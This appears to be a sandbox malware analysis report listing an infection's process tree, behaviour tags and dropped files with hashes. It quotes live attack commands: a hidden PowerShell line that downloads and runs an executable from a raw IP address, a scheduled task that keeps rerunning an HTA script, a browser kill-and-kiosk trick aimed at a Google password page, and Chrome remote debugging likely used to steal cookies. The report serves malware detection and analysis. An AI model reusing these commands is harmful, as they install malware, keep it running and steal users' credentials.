                            taskkill /F /IM msedge.exe /T
                            4⤵
                            • System Location Discovery: System Language Discovery
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1120
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /F /IM opera.exe /T
                            4⤵
                            • System Location Discovery: System Language Discovery
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2388
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /F /IM brave.exe /T
                            4⤵
                            • System Location Discovery: System Language Discovery
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1560
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                            4⤵
                              PID:2080
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                5⤵
                                • Checks processor information in registry
                                • Modifies registry class
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of SendNotifyMessage
                                PID:2696
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2696.0.819346737\947158833" -parentBuildID 20221007134813 -prefsHandle 1220 -prefMapHandle 1172 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b4e32939-6556-432a-a8a3-dc09409d75fa} 2696 "\\.\pipe\gecko-crash-server-pipe.2696" 1320 109cca58 gpu
                                  6⤵
                                    PID:1752
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2696.1.1036613929\920256364" -parentBuildID 20221007134813 -prefsHandle 1496 -prefMapHandle 1492 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7e1880dc-27d1-4e00-9706-b5399a2b7414} 2696 "\\.\pipe\gecko-crash-server-pipe.2696" 1524 43eeb58 socket
                                    6⤵
                                      PID:1196
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2696.2.87585882\766613505" -childID 1 -isForBrowser -prefsHandle 2096 -prefMapHandle 2092 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6cf7132d-fd1e-4fc7-9b5f-7f5a989b7a37} 2696 "\\.\pipe\gecko-crash-server-pipe.2696" 2108 16ae9958 tab
                                      6⤵
                                        PID:2136
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2696.3.116277161\1685674492" -childID 2 -isForBrowser -prefsHandle 2952 -prefMapHandle 2948 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b55a61c8-b0e8-46b7-b1f3-405fa424feda} 2696 "\\.\pipe\gecko-crash-server-pipe.2696" 2964 1cc33658 tab
                                        6⤵
                                          PID:2200
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2696.4.935229235\292997040" -childID 3 -isForBrowser -prefsHandle 3496 -prefMapHandle 1056 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {81e14174-5b6b-4fc3-9fff-04a709213a5b} 2696 "\\.\pipe\gecko-crash-server-pipe.2696" 3536 1abfbc58 tab
                                          6⤵
                                            PID:3628
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2696.5.1468105105\263862616" -childID 4 -isForBrowser -prefsHandle 3636 -prefMapHandle 3088 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3c35fdf-2e85-4e13-bef2-d3fb338d326b} 2696 "\\.\pipe\gecko-crash-server-pipe.2696" 3620 1e247258 tab
                                            6⤵
                                              PID:3636
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2696.6.1088693780\1935400186" -childID 5 -isForBrowser -prefsHandle 3740 -prefMapHandle 3736 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5d6b67e9-9b64-45d7-95c4-83e8ec93c0f7} 2696 "\\.\pipe\gecko-crash-server-pipe.2696" 3888 1e245d58 tab
                                              6⤵
                                                PID:3660
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2696.7.1415253781\1887522229" -parentBuildID 20221007134813 -prefsHandle 1332 -prefMapHandle 2276 -prefsLen 26607 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b4efefb8-c347-4758-be27-3a1e5c9d247d} 2696 "\\.\pipe\gecko-crash-server-pipe.2696" 2100 f2ff58 gpu
                                                6⤵
                                                  PID:3044
                                          • C:\Users\Admin\AppData\Local\Temp\1086728001\636ca944cf.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1086728001\636ca944cf.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious use of FindShellTrayWindow
                                            • Suspicious use of SendNotifyMessage
                                            PID:2540
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c schtasks /create /tn jIAOymaFQfO /tr "mshta C:\Users\Admin\AppData\Local\Temp\XrUF18pmZ.hta" /sc minute /mo 25 /ru "Admin" /f
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:1084
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /create /tn jIAOymaFQfO /tr "mshta C:\Users\Admin\AppData\Local\Temp\XrUF18pmZ.hta" /sc minute /mo 25 /ru "Admin" /f
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2524
                                            • C:\Windows\SysWOW64\mshta.exe
                                              mshta C:\Users\Admin\AppData\Local\Temp\XrUF18pmZ.hta
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              • Modifies Internet Explorer settings
                                              PID:2240
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'HWAXXYDHWXWEVPXVSGGRRCMVPHW93DYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                5⤵
                                                • Blocklisted process makes network request
                                                • Command and Scripting Interpreter: PowerShell
                                                • Downloads MZ/PE file
                                                • Loads dropped DLL
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1728
                                                • C:\Users\Admin\AppData\Local\TempHWAXXYDHWXWEVPXVSGGRRCMVPHW93DYD.EXE
                                                  "C:\Users\Admin\AppData\Local\TempHWAXXYDHWXWEVPXVSGGRRCMVPHW93DYD.EXE"
                                                  6⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:3580
                                          • C:\Users\Admin\AppData\Local\Temp\1086729001\0912c4b7df.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1086729001\0912c4b7df.exe"
                                            3⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:4048
                                          • C:\Users\Admin\AppData\Local\Temp\1086730001\9debe854f4.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1086730001\9debe854f4.exe"
                                            3⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            • Modifies system certificate store
                                            PID:3608
                                          • C:\Users\Admin\AppData\Local\Temp\1086731001\1be380a7e3.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1086731001\1be380a7e3.exe"
                                            3⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Writes to the Master Boot Record (MBR)
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:2992
                                          • C:\Users\Admin\AppData\Local\Temp\1086732001\3omTNLZ.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1086732001\3omTNLZ.exe"
                                            3⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            PID:1148
                                          • C:\Users\Admin\AppData\Local\Temp\1086733001\7aencsM.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1086733001\7aencsM.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Suspicious use of SetThreadContext
                                            • System Location Discovery: System Language Discovery
                                            PID:3596
                                            • C:\Users\Admin\AppData\Local\Temp\1086733001\7aencsM.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1086733001\7aencsM.exe"
                                              4⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              • Checks processor information in registry
                                              PID:2848
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                5⤵
                                                • Uses browser remote debugging
                                                • Enumerates system info in registry
                                                • Suspicious use of AdjustPrivilegeToken
                                                • Suspicious use of FindShellTrayWindow
                                                PID:1868
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef5a89758,0x7fef5a89768,0x7fef5a89778
                                                  6⤵
                                                    PID:2572
                                                  • C:\Windows\system32\ctfmon.exe
                                                    ctfmon.exe
                                                    6⤵
                                                      PID:3256
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1152 --field-trial-handle=1204,i,8494503269097151503,13630178523514420029,131072 /prefetch:2
                                                      6⤵
                                                        PID:3804
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1428 --field-trial-handle=1204,i,8494503269097151503,13630178523514420029,131072 /prefetch:8
                                                        6⤵
                                                          PID:3884
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1652 --field-trial-handle=1204,i,8494503269097151503,13630178523514420029,131072 /prefetch:8
                                                          6⤵
                                                            PID:756
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2164 --field-trial-handle=1204,i,8494503269097151503,13630178523514420029,131072 /prefetch:1
                                                            6⤵
                                                            • Uses browser remote debugging
                                                            PID:1348
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2180 --field-trial-handle=1204,i,8494503269097151503,13630178523514420029,131072 /prefetch:1
                                                            6⤵
                                                            • Uses browser remote debugging
                                                            PID:1196
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\kng4e" & exit
                                                          5⤵
                                                            PID:4560
                                                            • C:\Windows\SysWOW64\timeout.exe
                                                              timeout /t 10
                                                              6⤵
                                                              • Delays execution with timeout.exe
                                                              PID:4596
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 556
                                                          4⤵
                                                          • Loads dropped DLL
                                                          • Program crash
                                                          PID:2780
                                                      • C:\Users\Admin\AppData\Local\Temp\1086734001\DTQCxXZ.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\1086734001\DTQCxXZ.exe"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        PID:2288
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1086735041\tYliuwV.ps1"
                                                        3⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3112
                                                      • C:\Users\Admin\AppData\Local\Temp\1086736001\oVpNTUm.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\1086736001\oVpNTUm.exe"
                                                        3⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        PID:236
                                                      • C:\Users\Admin\AppData\Local\Temp\1086737001\qFqSpAp.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\1086737001\qFqSpAp.exe"
                                                        3⤵
                                                          PID:2660
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 836
                                                            4⤵
                                                            • Program crash
                                                            PID:1208
                                                        • C:\Users\Admin\AppData\Local\Temp\1086738001\Bjkm5hE.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\1086738001\Bjkm5hE.exe"
                                                          3⤵
                                                            PID:4252
                                                            • C:\Users\Admin\AppData\Local\Temp\1086738001\Bjkm5hE.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\1086738001\Bjkm5hE.exe"
                                                              4⤵
                                                                PID:3720
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 556
                                                                4⤵
                                                                • Program crash
                                                                PID:4340
                                                            • C:\Users\Admin\AppData\Local\Temp\1086739001\C3hYpvm.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\1086739001\C3hYpvm.exe"
                                                              3⤵
                                                                PID:4656
                                                              • C:\Users\Admin\AppData\Local\Temp\1086740001\135b204413.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1086740001\135b204413.exe"
                                                                3⤵
                                                                  PID:4796
                                                                • C:\Users\Admin\AppData\Local\Temp\1086741001\0376f5ca35.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\1086741001\0376f5ca35.exe"
                                                                  3⤵
                                                                    PID:3404
                                                              • C:\Windows\system32\taskeng.exe
                                                                taskeng.exe {D1973471-E3D2-4BE4-9F50-312AA7AAAEA4} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]
                                                                1⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:1592
                                                                • C:\ProgramData\dnxfkq\wxlfj.exe
                                                                  C:\ProgramData\dnxfkq\wxlfj.exe start2
                                                                  2⤵
                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                  • Checks BIOS information in registry
                                                                  • Executes dropped EXE
                                                                  • Identifies Wine through registry keys
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:2160
                                                                • C:\ProgramData\dnxfkq\wxlfj.exe
                                                                  C:\ProgramData\dnxfkq\wxlfj.exe start2
                                                                  2⤵
                                                                    PID:4768
                                                                  • C:\ProgramData\ixnpqsu\xfunr.exe
                                                                    C:\ProgramData\ixnpqsu\xfunr.exe start2
                                                                    2⤵
                                                                      PID:4444
                                                                  • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                                    "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                                    1⤵
                                                                      PID:3748

                                                                    Network

                                                                    MITRE ATT&CK Enterprise v15

                                                                    Replay Monitor

                                                                    Loading Replay Monitor...

                                                                    Downloads

                                                                    • C:\ProgramData\kng4e\8ymym7

                                                                      Filesize

                                                                      6KB

                                                                      MD5

                                                                      22a47746754019339967436f98fb7d9a

                                                                      SHA1

                                                                      53939d75aa9d759c06872f4fb772e1aec53ebe7e

                                                                      SHA256

                                                                      3565bf85e1d5f34b693ec643535f9c2a2fae6c5cfb7321c078d9909a0d429d5f

                                                                      SHA512

                                                                      b5fec8d0eb6b3ce65e658e8403f3fb55ea678b81916a9489dc9660ec468d4883803398eb12dc740e7f0c680f5dcd520126ea48fb0ecbb2caa2932cec5c368ab0

                                                                    • C:\Temp\HjO2Z8DvW.hta

                                                                      Filesize

                                                                      782B

                                                                      MD5

                                                                      16d76e35baeb05bc069a12dce9da83f9

                                                                      SHA1

                                                                      f419fd74265369666595c7ce7823ef75b40b2768

                                                                      SHA256

                                                                      456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7

                                                                      SHA512

                                                                      4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e

                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

                                                                      Filesize

                                                                      1KB

                                                                      MD5

                                                                      a266bb7dcc38a562631361bbf61dd11b

                                                                      SHA1

                                                                      3b1efd3a66ea28b16697394703a72ca340a05bd5

                                                                      SHA256

                                                                      df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

                                                                      SHA512

                                                                      0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

                                                                      Filesize

                                                                      242B

                                                                      MD5

                                                                      697f2916459a0c2d9e6907310e3ce625

                                                                      SHA1

                                                                      1b6e87e1f13034e1284231328dc0d6f98ac109d3

                                                                      SHA256

                                                                      aa2927f1e3aa9944fcf79f66c08c0df380dd3904ed28ac8968f78333e7cafc20

                                                                      SHA512

                                                                      59abe5b7d0635daf4777d6046175ad10ff600e063e89b8dda55367af87800aa372d636b76fb28668f25e4eecbd3bbc088e3de55db673c3b9b4b3ae12197caf42

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000007.dbtmp

                                                                      Filesize

                                                                      16B

                                                                      MD5

                                                                      18e723571b00fb1694a3bad6c78e4054

                                                                      SHA1

                                                                      afcc0ef32d46fe59e0483f9a3c891d3034d12f32

                                                                      SHA256

                                                                      8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

                                                                      SHA512

                                                                      43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8P9TO0C6\dll[1]

                                                                      Filesize

                                                                      236KB

                                                                      MD5

                                                                      2ecb51ab00c5f340380ecf849291dbcf

                                                                      SHA1

                                                                      1a4dffbce2a4ce65495ed79eab42a4da3b660931

                                                                      SHA256

                                                                      f1b3e0f2750a9103e46a6a4a34f1cf9d17779725f98042cc2475ec66484801cf

                                                                      SHA512

                                                                      e241a48eafcaf99187035f0870d24d74ae97fe84aaadd2591cceea9f64b8223d77cfb17a038a58eadd3b822c5201a6f7494f26eea6f77d95f77f6c668d088e6b

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NT668XG4\service[1].htm

                                                                      Filesize

                                                                      1B

                                                                      MD5

                                                                      cfcd208495d565ef66e7dff9f98764da

                                                                      SHA1

                                                                      b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                                      SHA256

                                                                      5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                                      SHA512

                                                                      31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NT668XG4\soft[1]

                                                                      Filesize

                                                                      987KB

                                                                      MD5

                                                                      f49d1aaae28b92052e997480c504aa3b

                                                                      SHA1

                                                                      a422f6403847405cee6068f3394bb151d8591fb5

                                                                      SHA256

                                                                      81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0

                                                                      SHA512

                                                                      41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

                                                                    • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhzluvd5.default-release\activity-stream.discovery_stream.json.tmp

                                                                      Filesize

                                                                      33KB

                                                                      MD5

                                                                      536da523e5a8f9123bdbe8cc0a615d21

                                                                      SHA1

                                                                      3b0b2bc63bce72b6117771260518fd6ff9c2fe6f

                                                                      SHA256

                                                                      32d6a5c24f4ba9332d67b2b2a87299c99ef3dbef922195badf44b33e3a451658

                                                                      SHA512

                                                                      3df9eecab88abc43fb5b281b6e61bbf52dc1b0f7941da2e2434650906b04b20d62ca39bb5a1983f7916a8d955dcf01aa043d18e312a4d7c5aec0167510e4e7f0

                                                                    • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhzluvd5.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                                                                      Filesize

                                                                      15KB

                                                                      MD5

                                                                      96c542dec016d9ec1ecc4dddfcbaac66

                                                                      SHA1

                                                                      6199f7648bb744efa58acf7b96fee85d938389e4

                                                                      SHA256

                                                                      7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                                                                      SHA512

                                                                      cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                                                                    • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe

                                                                      Filesize

                                                                      345KB

                                                                      MD5

                                                                      3987c20fe280784090e2d464dd8bb61a

                                                                      SHA1

                                                                      22427e284b6d6473bacb7bc09f155ef2f763009c

                                                                      SHA256

                                                                      e9af37031ed124a76401405412fe2348dad28687ac8f25bf8a992299152bd6d9

                                                                      SHA512

                                                                      5419469496f663cedcfa4acc6d13018a8ee957a43ff53f6ffa5d30483480838e4873ff64d8879996a32d93c11e727f0dded16ca04ab2e942ed5376ba29b10018

                                                                    • C:\Users\Admin\AppData\Local\Temp\1086173001\oVpNTUm.exe

                                                                      Filesize

                                                                      1.7MB

                                                                      MD5

                                                                      e530ce18cea99282aadae757106769cb

                                                                      SHA1

                                                                      a0b907734c0fd91781afe0419943cc7ffaf444d6

                                                                      SHA256

                                                                      0b9530cd6b6737242fe38711bd118a47471bc73a1801232fb46e0c0bb8309a54

                                                                      SHA512

                                                                      72be8a3aade02003b355fa023f14da86f8c3ffe5f408254e1c83bde4a9954469e0a2dc79df6d40ad712ac9c73c4acb357d46d595d2284198ac4779a01e39e72d

                                                                    • C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe

                                                                      Filesize

                                                                      2.0MB

                                                                      MD5

                                                                      4ec54f18caac758abacd2e4cacc68751

                                                                      SHA1

                                                                      5b9090808ab484d4978c806111a4ff0b18f1a3e6

                                                                      SHA256

                                                                      4361ad85e66ef87eb291bf51bb375b0151bac9428812a23fdc59e4ae49651683

                                                                      SHA512

                                                                      22833b28c08befc7cf7af764c0b67be6a93d7d11a6f03d3effc032abccf65d90715c195a24e37d7caaa5dacf21245d14685112afe18a55a299b57061ae7d1174

                                                                    • C:\Users\Admin\AppData\Local\Temp\1086705101\257584c93d.exe

                                                                      Filesize

                                                                      938KB

                                                                      MD5

                                                                      1c007a0cd679ade03670051e572e8100

                                                                      SHA1

                                                                      3f258e933e425502604283e72911d3e2e7ccbf2c

                                                                      SHA256

                                                                      a5f104358f5a53bf7a3480bb5f651d2474d6aa2956ea665589203983544b1b75

                                                                      SHA512

                                                                      a8a61cfecc76d5dc3e8f6519b134bc90053f33fa96c7e700b395a79076aa1b2cc4d11af166aea379da20fd07f61dc7b675108377be98f7830641fd8721e37a64

                                                                    • C:\Users\Admin\AppData\Local\Temp\1086706021\am_no.cmd

                                                                      Filesize

                                                                      2KB

                                                                      MD5

                                                                      189e4eefd73896e80f64b8ef8f73fef0

                                                                      SHA1

                                                                      efab18a8e2a33593049775958b05b95b0bb7d8e4

                                                                      SHA256

                                                                      598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396

                                                                      SHA512

                                                                      be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74

                                                                    • C:\Users\Admin\AppData\Local\Temp\1086707001\Ta3ZyUR.exe

                                                                      Filesize

                                                                      665KB

                                                                      MD5

                                                                      80c187d04d1f0a5333c2add836f8e114

                                                                      SHA1

                                                                      3f50106522bc18ea52934110a95c4e303df4665c

                                                                      SHA256

                                                                      124ad20b4a2db1cff783c08bfc45bed38fd915ed48adecbc844eb4e478b268a0

                                                                      SHA512

                                                                      4bef94e3bf76a517330ac21735ca35ff73dc63127b8d2be5f46323f8cfbe967e078d26fc79f5def8a3eb93d8da2d10fc67947d0cf5ec785300883a61556a7354

                                                                    • C:\Users\Admin\AppData\Local\Temp\1086708001\d2YQIJa.exe

                                                                      Filesize

                                                                      2.0MB

                                                                      MD5

                                                                      a6fb59a11bd7f2fa8008847ebe9389de

                                                                      SHA1

                                                                      b525ced45f9d2a0664f0823178e0ea973dd95a8f

                                                                      SHA256

                                                                      01c4b72f4deaa634023dbc20a083923657e578651ef1147991417c26e8fae316

                                                                      SHA512

                                                                      f6d302afa1596397a04b14e7f8d843651bd72df23ee119b494144c828fa371497f043534f60ae5908bc061b593132617264b9d1ea4735dccd971abb135b74c43

                                                                    • C:\Users\Admin\AppData\Local\Temp\1086719001\2f051bfec5.exe

                                                                      Filesize

                                                                      3.7MB

                                                                      MD5

                                                                      e56d48489155acb8f78a954df38f6986

                                                                      SHA1

                                                                      e8ddc0a9e48efe8c43f47130c720c82a84a9c3b0

